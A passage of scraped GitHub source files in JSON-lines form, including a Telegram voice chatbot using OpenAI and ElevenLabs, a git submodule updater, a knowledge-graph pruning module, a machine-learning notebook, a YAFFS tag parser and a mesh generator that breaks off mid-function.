text messages.\"\"\"\n    # Run ChatGPT asynchronously to generate a reply\n    reponse = await conversation.arun(update.message.text)\n    # Send the reply\n    await update.message.reply_text(reponse)\n\n\nasync def on_voices(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n    \"\"\"Handle voice messages.\"\"\"\n    audio = await update.message.voice.get_file()\n    await audio.download_to_drive(\"message_vocal.oga\")\n\n    # Transcribe the voice message\n    with open(\"message_vocal.oga\", \"rb\") as audio_file:\n        transcript = openai.Audio.transcribe(\n            \"whisper-1\",\n            audio_file,\n            api_key=os.environ[\"OPENAI_API_KEY\"])\n\n    # Run ChatGPT asynchronously to generate a reply\n    reponse = await conversation.arun(transcript[\"text\"])\n\n
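    # The generate() call below is the elevenlabs helper imported above, and\n    # the pydub conversion further down shells out to ffmpeg, so ffmpeg must\n    # be available on PATH for the voice reply to work.\n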
    # Generate the voice reply\n    audio = generate(\n        text=reponse,\n        voice=\"Bella\",\n        model=\"eleven_multilingual_v1\"\n    )\n\n    # Save the generated audio to a temporary file\n    with open(\"voix_genere.mp3\", \"wb\") as f:\n        f.write(audio)\n\n    # Convert the audio to a format Telegram accepts as a voice message (.ogg)\n    AudioSegment.from_file(\"voix_genere.mp3\", \"mp3\").export(\n        \"voix_genere.ogg\", format=\"ogg\")\n    await update.message.reply_voice(\"voix_genere.ogg\")\n\n    # Remove the temporary audio files\n    os.remove(\"message_vocal.oga\")\n    os.remove(\"voix_genere.mp3\")\n    os.remove(\"voix_genere.ogg\")\n\n\ndef setup_conversation() -> None:\n    # LLM\n    llm = ChatOpenAI(openai_api_key=os.environ[\"OPENAI_API_KEY\"])\n\n    # Prompt\n    prompt = ChatPromptTemplate(\n        messages=[\n            SystemMessagePromptTemplate.from_template(\n                \"You are a nice chatbot having a conversation with a human. Give simple answers no list or long sentences.\"\n            ),\n            # The `variable_name` here is what must align with memory\n            MessagesPlaceholder(variable_name=\"chat_history\"),\n            HumanMessagePromptTemplate.from_template(\"{question}\")\n        ]\n    )\n\n    # Keep the message history in memory\n    memory = ConversationBufferMemory(memory_key=\"chat_history\", return_messages=True)\n\n    # Build the conversation chain on top of the ChatGPT model\n    global conversation\n    conversation = LLMChain(\n        llm=llm,\n        prompt=prompt,\n        memory=memory\n    )\n\n\ndef main() -> None:\n    # Load the environment variables\n    load_dotenv()\n\n    # Build the conversation chain\n    setup_conversation()\n\n    # Create the application with the Telegram token\n    application = Application.builder().token(os.environ[\"TELEGRAM_TOKEN\"]).build()\n\n    # Handle incoming messages (other than commands)\n    application.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, on_messages))\n    application.add_handler(MessageHandler(filters.VOICE & ~filters.COMMAND, on_voices))\n\n    # Run the bot until it is interrupted\n    application.run_polling(allowed_updates=Update.ALL_TYPES)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Gamma-Software/ChatGPTVoiceTelegramBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73268630272","text":"import sys, os, subprocess, re\n\ndef trim(line):\n    line = line.replace('\\t', '')\n    line = line.replace('\\n', '')\n    line = line.replace(' ', '')\n    return line\n\ndef makeAbsolute(currentDir, relativeDir):\n    return os.path.join(currentDir, relativeDir)\n\ndef checkUrl(url):\n    matchObj = re.match(\"[a-zA-Z0-9:/.]+\", url)\n    if (matchObj != None):\n        return url\n    return None\n\ndef checkBranch(branch):\n    matchObj = re.match(\"[a-zA-Z0-9.]+\", branch)\n    if (matchObj != None):\n        return branch\n    return None\n\ndef checkShallow(shallow):\n    if (shallow == \"true\" or shallow == \"false\"):\n        return shallow\n    return None\n\ndef execProgram(args):\n    subprocess.call(args.split(' '))\n\n\ndef changeDirectory(directory):\n\n    try:\n        os.chdir(directory)\n        val = os.getcwd()\n        directory = directory.replace('\\\\', '/')\n        val = val.replace('\\\\', '/')\n        return directory == val\n    except:\n        pass\n    return False\n\n\ndef collectModules(currentDir, gitModulesFile):\n    moduleDict = {}\n\n    file = open(makeAbsolute(currentDir, gitModulesFile), mode='r')\n    lines = file.readlines()\n    file.close()\n\n    # this assumes that variables come after the path\n    moduleName = None\n\n    for line in lines:\n        line = trim(line)\n        subModuleCode = \"[submodule\\\"\"\n        if (line.startswith(subModuleCode)):\n            moduleName = line[len(subModuleCode):-2]\n            moduleDict[moduleName] = {}\n            variableDict = moduleDict[moduleName]\n            variableDict['hasUrl'] = False\n\n        elif (moduleName != None):\n            # exclude everything before\n            variableDict = moduleDict[moduleName]\n\n            if (line.find(\"url=\") != -1):\n                variableDict[\"url\"] = 
checkUrl(line.replace(\"url=\", ''))\n variableDict['hasUrl'] = True;\n elif (line.find(\"branch=\") != -1):\n variableDict[\"branch\"] = checkBranch(line.replace(\"branch=\", ''))\n elif (line.find(\"shallow=\") != -1):\n variableDict[\"shallow\"] = checkShallow(line.replace(\"shallow=\", ''))\n elif (line.find(\"path=\") != -1):\n moduleDirectory = line.replace(\"path=\", '')\n absPath = None\n if (os.path.isabs(moduleDirectory)):\n absPath = moduleDirectory\n else:\n absPath = makeAbsolute(currentDir, moduleDirectory)\n\n if (os.path.isdir(absPath)):\n variableDict[\"path\"] = absPath\n else:\n if (len(line) > 0):\n print(\"unhandled line: \", line)\n\n\n for key in moduleDict.keys():\n module = moduleDict[key]\n if (module.get(\"hasUrl\", False) == False):\n print(\"unable to determine the url for the module:\", key)\n\n return moduleDict\n\n\ndef initModules():\n # this is meant to be called from the same directory\n # as the module script.\n\n execProgram(\"git submodule init\")\n execProgram(\"git submodule update --init --merge\")\n\ndef updateModules(currentDir, moduleDict):\n\n for key in moduleDict.keys():\n module = moduleDict[key]\n\n path = module.get(\"path\", None)\n branch = module.get(\"branch\", None)\n shallow = module.get(\"shallow\", None)\n url = module.get(\"url\", None)\n\n if (path != None):\n if (not os.path.isdir(path)): \n print(\"could not determine the directory for the \"\n \"supplied path:\",path);\n continue\n\n if (url == None): \n continue\n\n if (not changeDirectory(path)):\n print(\"could not switch directory \"\n \"to the module at the supplied path:\",path);\n continue\n\n branchStr = \"master\"\n if (branch != None): \n branchStr = branch\n\n shallowValue = False\n if (shallow != None):\n shallowValue= (shallow == 'true')\n\n if (shallowValue == False):\n print(\"git checkout\", branchStr)\n execProgram(\"git checkout %s\"%branchStr)\n print(\"git pull\")\n execProgram(\"git pull\")\n else:\n print(\"git clone\", \"-f -B \", branchStr)\n execProgram(\"git checkout -f -B %s\"%branchStr)\n print(\"git pull\", url, branchStr)\n execProgram(\"git pull %s %s\"%(url, branchStr))\n\ndef main():\n currentDir = os.getcwd()\n gitModulesFile = os.path.abspath(\".gitmodules\")\n\n if (not os.path.isfile(gitModulesFile)):\n print(\"No .gitmodule found in\", currentDir, \"\\nNothing to update...\")\n return\n\n moduleDict = collectModules(currentDir, gitModulesFile)\n\n initModules()\n updateModules(currentDir, moduleDict)\n changeDirectory(currentDir)\n\n\n\nif __name__== '__main__':\n main()","repo_name":"csparks78/Jam","sub_path":"gitupdate.py","file_name":"gitupdate.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"329158108","text":"from collections import defaultdict\nfrom grams.algorithm.data_graph.dg_config import DGConfigs\nimport networkx as nx\nfrom typing import Dict, List, Optional, Tuple, TypedDict, Union, cast\n\nfrom functools import cmp_to_key\nfrom grams.algorithm.data_graph.dg_graph import (\n CellNode,\n DGEdge,\n DGGraph,\n DGNode,\n EdgeFlowSource,\n EdgeFlowTarget,\n EntityValueNode,\n FlowProvenance,\n LinkGenMethod,\n LiteralValueNode,\n StatementNode,\n)\nfrom graph.retworkx import digraph_all_simple_paths\n\n\nclass DGPruning:\n NxDGEdgeAttr = TypedDict(\"NxDGEdgeAttr\", data=DGEdge)\n NxDGEdge = Tuple[str, str, str, NxDGEdgeAttr]\n\n def __init__(self, dg: DGGraph):\n self.dg = dg\n\n def prune_hidden_entities(self):\n \"\"\"Prune 
redundant KG entities, which were added to the graph via KG discovery and from the context.\n\n        **Step 1:**\n        Let:\n        - n be an entity node in DG.\n        - v be a node connected from n via a property: LEG2: n -> p -> s -> p' -> v, where s has no property/qualifier other than p'\n\n        We apply the following heuristics:\n        * If no other node connects to n, then n is a root node and comes from the context. We should not\n        prune this node, so just skip it.\n        * For every other node ui in U that connects to n via the path LEG1: ui -> pi -> s' -> pi' -> n, if there is always a better\n        path LEG* between ui and v, then we can remove the path LEG2. U contains nodes in cells or context; otherwise\n        ui would be an entity-to-entity link that won't be in the final model anyway.\n        Note: LEG* is better than LEG2 when it is shorter, or comes from a Wikidata link, or, failing that, has better match confidence (i.e., better provenance)\n\n        **Step 2:** (?) this is questionable -- controlled by the PRUNE_SINGLE_LEAF_ENT flag\n        Let n' be an entity node in DG that does not link to other nodes (v doesn't exist).\n        We apply the following heuristics:\n        * If no other node connects to it, it is a standalone node and should be removed\n        * For any node ui that connects to n via the path LEG1: ui -> pi -> s' -> pi' -> n: if s' doesn't have other properties/qualifiers,\n        then we can remove LEG1.\n\n        **Step 3:**\n        Let n be an entity/literal node in DG (not from cells & context)\n        * If there is only one entity node u that connects to n via the path LEG1: u -> p -> s -> p' -> n, then we can remove n. If that renders the\n        statement s without value, we will remove s as well.\n\n        **Step 4:**\n        Finally, if a node is standalone, we should remove it.\n        \"\"\"\n        # step 1: prune the second leg paths\n        legprime: Dict[Tuple[str, str], Optional[FlowProvenance]] = {}\n        rm_legs: List[Tuple[str, EdgeFlowSource, EdgeFlowTarget]] = []\n        for n in self.dg.iter_nodes():\n            if not isinstance(n, EntityValueNode):\n                continue\n\n            if self.dg.in_degree(n.id) == 0:\n                # no other node connects to it\n                continue\n\n            # get the list of grandparents ui (only cells or values in the context), along with their paths to node n.\n            grandpa = set()\n            for gp in self.iter_grand_parents(n.id):\n                if isinstance(gp, CellNode) or (\n                    isinstance(gp, (EntityValueNode, LiteralValueNode))\n                    and gp.is_context\n                ):\n                    grandpa.add(gp.id)\n\n            # for _, sid, ns_eid in self.dg.out_edges(nid, keys=True):\n            #     stmt: StatementNode = self.dg.nodes[sid][\"data\"]\n            for ns_edge in self.dg.out_edges(n.id):\n                stmt = self.dg.get_node(ns_edge.target)\n                assert isinstance(stmt, StatementNode)\n                stmt_outedges = self.dg.out_edges(stmt.id)\n                if len(stmt_outedges) > 1:\n                    # this stmt has other qualifiers, so it's not what we are looking for\n                    continue\n\n                for sv_outedge in stmt_outedges:\n                    v = self.dg.get_node(sv_outedge.target)\n                    # got leg 2, now look for all incoming\n                    leg2 = (\n                        EdgeFlowSource(n.id, ns_edge.predicate),\n                        EdgeFlowTarget(v.id, sv_outedge.predicate),\n                    )\n                    if not stmt.has_flow(*leg2):\n                        continue\n                    leg2_provenance = stmt.get_provenance(*leg2)\n\n                    has_better_paths = True\n                    for gpid in grandpa:\n                        if (gpid, v.id) not in legprime:\n                            paths = [\n                                (\n                                    cast(\n                                        StatementNode, self.dg.get_node(path[0].target)\n                                    ),\n                                    EdgeFlowSource(path[0].source, path[0].predicate),\n                                    EdgeFlowTarget(path[1].target, path[1].predicate),\n                                )\n                                for path in digraph_all_simple_paths(\n                                    self.dg,\n                                    gpid,\n                                    v.id,\n                                    cutoff=2,\n                                )\n                            ]\n                            provs = [\n                                prov\n                                for s, sf, tf in paths\n                                if s.has_flow(sf, tf)\n                                for prov in 
s.get_provenance(sf, tf)\n ]\n if len(provs) == 0:\n legprime[gpid, v.id] = None\n else:\n legprime[gpid, v.id] = max(\n provs,\n key=cmp_to_key(\n self.specific_pruning_provenance_cmp\n ),\n )\n best_prov = legprime[gpid, v.id]\n if (\n best_prov is None\n or max(\n self.specific_pruning_provenance_cmp(\n best_prov, leg2_prov\n )\n for leg2_prov in leg2_provenance\n )\n < 0\n ):\n # no better path\n has_better_paths = False\n break\n\n if has_better_paths:\n rm_legs.append((stmt.id, leg2[0], leg2[1]))\n\n # logger.info(\"#legs: {}\", len(rm_legs))\n self.remove_flow(rm_legs)\n # logger.info(\"# 0-indegree: {}\", sum(self.dg.in_degree(uid) == 0 for uid in self.dg.nodes))\n # logger.info(\"# 0-outdegree: {}\", sum(self.dg.out_degree(uid) == 0 for uid in self.dg.nodes))\n # logger.info(\"# 0-standalone: {}\",\n # sum(self.dg.out_degree(uid) + self.dg.in_degree(uid) == 0 for uid in self.dg.nodes))\n\n # step 2: prune the first leg paths (temporary disable)\n if DGConfigs.PRUNE_SINGLE_LEAF_ENT:\n rm_legs: List[Tuple[str, EdgeFlowSource, EdgeFlowTarget]] = []\n for n in self.dg.iter_nodes():\n if not isinstance(n, EntityValueNode) or self.dg.out_degree(n.id) > 0:\n continue\n\n for sn_edge in self.dg.in_edges(n.id):\n if self.dg.out_degree(sn_edge.source) == 1:\n # stmt does not have other property/qualifier\n target_flow = EdgeFlowTarget(n.id, sn_edge.predicate)\n stmt = self.dg.get_node(sn_edge.source)\n assert isinstance(stmt, StatementNode)\n for source_flow, _ in stmt.iter_source_flow(target_flow):\n rm_legs.append((sn_edge.source, source_flow, target_flow))\n self.remove_flow(rm_legs)\n\n rm_legs: List[Tuple[str, EdgeFlowSource, EdgeFlowTarget]] = []\n # step 3\n for n in self.dg.iter_nodes():\n if (\n not isinstance(n, (EntityValueNode, LiteralValueNode))\n or self.dg.out_degree(n.id) > 0\n or n.is_context\n ):\n continue\n # for sid, _, sn_eid, sn_edata in self.dg.in_edges(nid, data=True, keys=True):\n for sn_edge in self.dg.in_edges(n.id):\n # for uid, _, us_eid in self.dg.in_edges(sn_edge.source):\n for us_edge in self.dg.in_edges(sn_edge.source):\n if isinstance(self.dg.get_node(us_edge.source), EntityValueNode):\n # two consecutive entity nodes, we can remove this link\n stmt = self.dg.get_node(sn_edge.source)\n assert isinstance(stmt, StatementNode)\n if us_edge.predicate == sn_edge.predicate:\n # the link we are going to remove is the statement value, so we should remove the statement\n for source_flow, target_flow in stmt.flow:\n rm_legs.append((stmt.id, source_flow, target_flow))\n else:\n target_flow = EdgeFlowTarget(n.id, sn_edge.predicate)\n for source_flow, _ in stmt.iter_source_flow(target_flow):\n rm_legs.append((stmt.id, source_flow, target_flow))\n\n # logger.info(\"#legs: {}\", len(rm_legs))\n self.remove_flow(rm_legs)\n # logger.info(\"# 0-indegree: {}\", sum(self.dg.in_degree(uid) == 0 for uid in self.dg.nodes))\n # logger.info(\"# 0-outdegree: {}\", sum(self.dg.out_degree(uid) == 0 for uid in self.dg.nodes))\n # logger.info(\"# 0-standalone: {}\",\n # sum(self.dg.out_degree(uid) + self.dg.in_degree(uid) == 0 for uid in self.dg.nodes))\n self.prune_disconnected_nodes()\n\n def prune_disconnected_nodes(self):\n \"\"\"This function prune out disconnected nodes that are:\n 1. nodes without incoming edges and outgoing edges\n 2. 
statement nodes with no incoming edges or no outgoing edges\n\n        Returns\n        -------\n        \"\"\"\n        rm_nodes = set()\n        for u in self.dg.iter_nodes():\n            if isinstance(u, EntityValueNode):\n                if self.dg.in_degree(u.id) == 0 and self.dg.out_degree(u.id) == 0:\n                    rm_nodes.add(u.id)\n            elif isinstance(u, StatementNode):\n                if self.dg.in_degree(u.id) == 0 or self.dg.out_degree(u.id) == 0:\n                    rm_nodes.add(u.id)\n        for uid in rm_nodes:\n            self.dg.remove_node(uid)\n\n    def remove_flow(self, flows: List[Tuple[str, EdgeFlowSource, EdgeFlowTarget]]):\n        for sid, source_flow, target_flow in flows:\n            stmt = cast(StatementNode, self.dg.get_node(sid))\n            stmt.untrack_flow(source_flow, target_flow)\n            if not stmt.has_source_flow(source_flow):\n                self.dg.remove_edge_between_nodes(\n                    source_flow.source_id, sid, source_flow.edge_id\n                )\n            if not stmt.has_target_flow(target_flow):\n                self.dg.remove_edge_between_nodes(\n                    sid, target_flow.target_id, target_flow.edge_id\n                )\n\n    def specific_pruning_provenance_cmp(\n        self, prov0: FlowProvenance, prov1: FlowProvenance\n    ) -> int:\n        # compare provenances, favouring Wikidata links over matched links\n        if prov0.gen_method == LinkGenMethod.FromWikidataLink:\n            # always favour from wikidata link\n            return 1\n        if prov1.gen_method == LinkGenMethod.FromWikidataLink:\n            return -1\n        # assert prov0.gen_method == prov1.gen_method and prov0.gen_method_arg == prov1.gen_method_arg\n        # we do not need to check that the two gen methods and args are equal: even if we select the\n        # incorrect one, we only truncate when the other leg is worse than it\n        return prov0.prob - prov1.prob  # type: ignore\n\n    def iter_grand_parents(self, nid: str):\n        for parent in self.dg.predecessors(nid):\n            for grand_parent in self.dg.predecessors(parent.id):\n                yield grand_parent\n\n    # def out_edges(self, uid: str) -> Dict[str, List[DGEdge]]:\n    #     label2edges = defaultdict(list)\n    #     for _, vid, eid, edata in self.dg.out_edges(uid, data=True, keys=True):\n    #         label2edges[eid].append(edata[\"data\"])\n    #     return label2edges\n","repo_name":"usc-isi-i2/GRAMS","sub_path":"grams/algorithm/data_graph/dg_pruning.py","file_name":"dg_pruning.py","file_ext":"py","file_size_in_byte":12814,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"36834612632","text":"# %%\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import chi2, mutual_info_classif\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, f1_score, confusion_matrix, classification_report\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sys\nimport mlflow\n\n# %%\nmobile = pd.read_csv('mobile.csv')\nmobile.head(3)\n\n# %%\nplt.figure(figsize=(10,10))\nsns.countplot(x='price_range', data=mobile)\n\n# %%\ndst_mob = mobile.select_dtypes(exclude='object')\ndst_mob\n\n# %%\nmobile.info()\n\n# %%\nplt.hist(mobile.price_range)\n\n# %%\n# histplot replaces the deprecated distplot\nsns.histplot(mobile.price_range, kde=True)\n\n# %%\nmobile.shape\n\n# %%\nmobile.nunique()\n\n# %%\nmobile.columns\n\n# %%\nX = mobile.iloc[:,:-1]\ny = mobile.iloc[:,-1]\n\n
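# %% [markdown]\n# Note: SelectKBest with chi2 (next cells) requires non-negative feature\n# values; the raw handset specs satisfy that, which is why the chi2 scores\n# are computed before standard scaling (scaled values can be negative).\n\n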
# %%\ny.head(3)\n\n# %% [markdown]\n# # Feature selection with SelectKBest using chi2\n\n# %%\nbest_features_score = SelectKBest(score_func=chi2, k=10)\nbest_features_score.fit(X, y)\nbest_features = pd.DataFrame(best_features_score.scores_, columns=['score'])\nbest_features\nXcols = pd.DataFrame(X.columns, columns=['Feature_name'])\nbest_scores = pd.concat([Xcols, best_features], axis=1)\nbest_scores\n\n# %% [markdown]\n# # Top 10 feature scores\n\n# %%\nbest_scores.nlargest(10, 'score')\n\n# %%\n# train and test data splits\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=124)\n\n# %%\n# scale the features\nscaler = StandardScaler()\nmob_scaled = scaler.fit_transform(X)\nmob_scaled\n\n# %%\n# separate split for the scaled features, so the raw split above stays usable\nX_train_s, X_test_s, y_train_s, y_test_s = train_test_split(mob_scaled, y, test_size=0.3, random_state=124)\n\n# %%\n# model selection\nmodel_lr_mob = LogisticRegression()\nmodel_lr_mob_scaled = LogisticRegression()\nmodel_dt_mob = DecisionTreeClassifier()\nmodel_rf_mob = RandomForestClassifier()\n\n# %%\n# Pipeline steps must be (name, estimator) pairs\npipe_lr = Pipeline([('scaler', StandardScaler()), ('logreg', LogisticRegression())])\n\n# %% [markdown]\n# # MLflow integration\n\n# %%\n# set up the experiment using MLflow\nmlflow.set_experiment(\"Classification Experiment\")\nmlflow.sklearn.autolog()\n\n# %%\n# experiment: logistic regression on the scaled features\nwith mlflow.start_run(run_name=\"Scaled Logistic regression\") as run:\n    model_lr_mob_scaled.fit(X_train_s, y_train_s)\n    predslr = model_lr_mob_scaled.predict(X_test_s)\n\n# %%\nprint(\"Logistic regression (scaled features) training and test scores:\")\nprint(\"Model score on training data:\", model_lr_mob_scaled.score(X_train_s, y_train_s))\nprint(\"Model score on test data:\", model_lr_mob_scaled.score(X_test_s, y_test_s))\n\n# %%\n# experiment: logistic regression without scaling (uses the raw-feature split)\nwith mlflow.start_run(run_name=\"Logistic regression\") as run:\n    model_lr_mob.fit(X_train, y_train)\n    predslr = model_lr_mob.predict(X_test)\n\n# %%\nprint(\"Logistic regression training and test scores:\")\nprint(\"Model score on training data:\", model_lr_mob.score(X_train, y_train))\nprint(\"Model score on test data:\", model_lr_mob.score(X_test, y_test))\n\n# %%\n# experiment: decision tree classifier without scaling\nwith mlflow.start_run(run_name=\"Decision Tree Classifier\") as run:\n    model_dt_mob.fit(X_train, y_train)\n    preds_dt = model_dt_mob.predict(X_test)\n\n# %%\nprint(\"Decision tree classifier training and test scores:\")\nprint(\"Model score on training data:\", model_dt_mob.score(X_train, y_train))\nprint(\"Model score on test data:\", model_dt_mob.score(X_test, y_test))\n\n# %%\n# experiment: random forest classifier without scaling\nwith mlflow.start_run(run_name=\"Random Forest classifier\") as run:\n    model_rf_mob.fit(X_train, y_train)\n    preds_rf = model_rf_mob.predict(X_test)\n\n# %%\nprint(\"Random forest classifier training and test scores:\")\nprint(\"Model score on training data:\", model_rf_mob.score(X_train, y_train))\nprint(\"Model score on test data:\", model_rf_mob.score(X_test, y_test))\n","repo_name":"bizsuresh/DSprojects","sub_path":"mob_class.py","file_name":"mob_class.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35637697138","text":"import wikipedia as wiki\n#h=\"https://en.wikipedia.org/wiki/\"\nh=\"\"\nfor j in range(49,55):\n
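    # each pass writes one batch file of 1000 random article titles\n    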
file=open(\"url1000_0\"+str(j)+\".dat\",\"w\")\n    for num in range(1000):\n        nam = wiki.random(1)\n        nam = nam.replace(\" \", \"_\")\n        file.write(str(h)+str(nam)+\"\\n\")\n    file.close()\n","repo_name":"Marc-xyz/SyntaxColor","sub_path":"scraping_names_of_articles.py","file_name":"scraping_names_of_articles.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35395344279","text":"\"\"\"\nCreates the base test to be used as a starting point for all\nintegration tests.\n\nThis should be the parent class to each non-unit test.\nIt allows for instantiation of the database dynamically\nand makes sure that it is a new, blank database each time.\n\nClasses:\n--------\n    None\n\nFunctions:\n----------\n    override_get_db():\n        overrides the default db session with the test instance\n\nMisc Variables:\n--------------\n    SQLALCHEMY_DATABASE_URL: str\n        the default test db url\n    engine: Session\n        the test db session\n\"\"\"\nimport sqlalchemy\n\nfrom sqlalchemy.orm import sessionmaker\nfrom fastapi.testclient import TestClient\n\nfrom app.main import app\nfrom app.database import Base, get_db\n\nSQLALCHEMY_DATABASE_URL = \"sqlite:///./test.db\"\n\nengine = sqlalchemy.create_engine(\n    url=SQLALCHEMY_DATABASE_URL, connect_args={\"check_same_thread\": False}\n)\n\nTestingSessionLocal = sessionmaker(\n    autocommit=False, autoflush=False, bind=engine)\n\n\nBase.metadata.drop_all(bind=engine)\nBase.metadata.create_all(bind=engine)\n\n\ndef override_get_db():\n    try:\n        db = TestingSessionLocal()\n        yield db\n    finally:\n        db.close()\n\n\napp.dependency_overrides[get_db] = override_get_db\n\ndb = TestingSessionLocal()\nclient = TestClient(app=app)\n","repo_name":"Gichia/fast-api-starter","sub_path":"app/tests/base_test.py","file_name":"base_test.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28749048295","text":"import time\r\nimport random\r\n\r\n\r\nclass Robot:\r\n\r\n    def __init__(self, name, colour):\r\n        self.colour = colour\r\n        self.name = name\r\n        # sensor readings start at a random value and are refreshed after each check\r\n        self.temp = random.randint(0, 50)\r\n        self.battery = random.randint(0, 100)\r\n        self.speed = random.randint(0, 40)\r\n\r\n    def start(self):\r\n        print(\"Hello! Please wait, the boot is loading; it may take a few seconds.....\")\r\n\r\n    def shutdown(self):\r\n        print(\"I am off now, so goodbye and have a great day...\")\r\n\r\n    def clean(self):\r\n        option = input(\"do you want me to clean the place?: \")\r\n        if option == \"yes\":\r\n            print(\"I am cleaning\")\r\n        else:\r\n            print(\"That's fine\")\r\n\r\n    def news(self):\r\n        op2 = input().lower()\r\n        options = [\"tell me the news\", \"what is the news\"]\r\n        if op2 in options:\r\n            print(\"Today's news is xyz...\")\r\n        else:\r\n            print(\"cannot understand\")\r\n\r\n    def times(self):\r\n        op3 = input().lower()\r\n        options = [\"what is the time\", \"tell me the time\"]\r\n        if op3 in options:\r\n            print(time.ctime())\r\n        else:\r\n            print(\"cannot understand\")\r\n\r\n    def temperature(self):\r\n        if self.temp > 40:\r\n            print(\"I am overheated!\")\r\n        else:\r\n            self.temp = random.randint(0, 50)\r\n\r\n    def power(self):\r\n        if self.battery < 20:\r\n            print(\"Low battery power! Please charge\")\r\n        else:\r\n            self.battery = random.randint(0, 100)\r\n\r\n    def acceleration(self):\r\n        if self.speed > 20:\r\n            print(\"My speed has increased : \" + str(self.speed))\r\n        else:\r\n            self.speed = random.randint(0, 40)\r\n\r\n\r\nbot = Robot(\"dora\", \"black\")\r\nbot.start()\r\nbot.acceleration()\r\nbot.temperature()\r\nbot.clean()\r\nbot.power()\r\nbot.news()\r\nbot.times()\r\nbot.shutdown()\r\n","repo_name":"AnshulMurnal/Pydev","sub_path":"ROBOT.py","file_name":"ROBOT.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12497889494","text":"import struct\n\nclass YaffsOobTag:\n    \"\"\"\n    oobBytes should be the raw bytes of the out of band area of NAND.\n    \"\"\"\n\n    def __init__(self, oobBytes=None, tag_offset=1):\n        if oobBytes is None:\n            return\n\n        # Reference to the parent block class for this Oobtag.\n        self.block_cls = None\n        self.tag_offset = tag_offset\n\n        # The Layout of the oob is not controlled entirely by Yaffs so\n        # the specific offsets for these fields may be different for different\n        # phones.\n        # Four little-endian 32-bit fields starting at the tag offset (layout\n        # assumed from the field names; as noted above, it may differ per device).\n        (self.block_seq,\n         self.object_id,\n         self.chunk_id,\n         self.num_bytes) = struct.unpack(\"<LLLL\", oobBytes[tag_offset:tag_offset + 16])\n\n        topByte = self.object_id >> 24\n\n        #self.isBadBlock = (self.block_status != '\\xff')\n\n        self.isHeaderTag = (topByte == 0x80 or topByte == 0xC0)\n        self.is_shrink_header = (topByte == 0xC0)\n\n        # The top byte in the objectId field is overloaded in the header tag\n        # to denote the type of object. We need to mask that out.\n        if self.isHeaderTag:\n            self.object_id &= 0x00ffffff\n            self.chunk_id = 0\n\n        # erased or empty block\n        self.is_erased = (self.block_seq == 0xffffffff)\n\n        # non-empty block, but the object has been deleted\n        self.isDeleted = (self.chunk_id == 0xc0000004)\n\n        # This field is set by the Yaffs Object upon\n        # reconstruction of the different versions.\n        # It denotes that this chunk is used by the most recent\n        # version of the Yaffs object.\n        self.is_most_recent = False\n\n\n    def __str__(self):\n        return 'Block Seq: %d, Object Id: %d, Chunk Id: %d, Num. 
Bytes: %d' \\\n % (self.block_seq, self.object_id, self.chunk_id, self.num_bytes)","repo_name":"rjwalls/YaffsParser","sub_path":"YaffsClasses/YaffsOobTag.py","file_name":"YaffsOobTag.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"71908598590","text":"from tqdm.contrib.concurrent import process_map\nfrom multiprocessing import Manager\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.tri as mtri\nimport time\nimport os\n\nimport scipy.spatial as spsa\nimport scipy.sparse as sp\nfrom scipy.sparse.linalg import spsolve as solver\n\n#plottefunksjon for punkter\ndef plotPoints(p):\n for point in p:\n plt.plot(point[0],point[1],'ro',markersize=3)\n\n#plottefunksjon for elementer\ndef plotElements(p,elements):\n for el in elements:\n #Q1 elements\n connectPoints(p[el[0][0]],p[el[0][1]])\n connectPoints(p[el[0][1]],p[el[0][3]])\n connectPoints(p[el[0][3]],p[el[0][2]])\n connectPoints(p[el[0][2]],p[el[0][0]])\n #Q2 elements (only visible part)\n connectPoints(p[el[1][4]],p[el[1][1]],color = 'orange')\n connectPoints(p[el[1][4]],p[el[1][3]],color = 'orange')\n connectPoints(p[el[1][4]],p[el[1][5]],color = 'orange')\n connectPoints(p[el[1][4]],p[el[1][7]],color = 'orange')\n\n#hjelpefunksjon\ndef connectPoints(a,b,color = 'darkviolet'):\n a1, a2 = a[0], a[1]\n b1, b2 =b[0], b[1]\n plt.plot([a1,b1],[a2,b2], color, marker='',linewidth =.5)\n\n#plottefunksjon for kanter\ndef plotEdges(inputEdge,p):\n for edge in inputEdge:\n connectPoints(p[int(edge[0])],p[int(edge[1])],color = 'r') \n\ndef halfCircleMeshMaker(x0,x1,y0,y1 = np.inf, Nr = 1,edgepoints = False):\n r = (x1 - x0)/2\n rpart = r/Nr\n rlist = np.asarray([rpart*n for n in range(1,Nr+1)])\n Nlist = [n for n in range(1,Nr+1)]\n px = [x0+r]\n py = [y0]\n count = 0\n flatedge = [0]\n curvededge = []\n for rad,num in 